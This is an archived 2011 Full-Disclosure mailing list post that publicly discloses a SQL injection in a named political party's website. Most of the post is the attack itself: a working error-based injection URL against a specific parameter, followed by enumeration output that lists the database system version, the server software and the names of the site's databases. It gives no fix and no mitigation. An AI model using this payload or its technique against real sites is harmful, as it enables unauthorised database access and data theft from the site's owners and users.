[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] conservative.ca SQL Injection

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] conservative.ca SQL Injection
From: m4l1c3 <malice.anon@xxxxxxxxx>
Date: Sun, 1 May 2011 13:49:43 -0400

http://www.conservative.ca/index.php?section_copy_id=21257ï¿½ion_i' AND
(SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT
(CASE WHEN (3997=3997) THEN 1 ELSE 0
END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN

DBMS is MySQL 5.0
running Linux CentOS 5,Apache 2.2.3, PHP 5.2.12

available databases [4]:
[*] conservativ_ca_v1_6_store_v1_0
[*] conservativ_ca_v1_81
[*] information_schema
[*] test

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ISecAuditors Security Advisories] XSS in Oracle AS Portal 10g
Next by Date: [Full-disclosure] Call For Papers: International Journal "Network Protocols and Algorithms"
Previous by thread: [Full-disclosure] [ISecAuditors Security Advisories] XSS in Oracle AS Portal 10g
Next by thread: [Full-disclosure] Call For Papers: International Journal "Network Protocols and Algorithms"
Index(es):
- Date
- Thread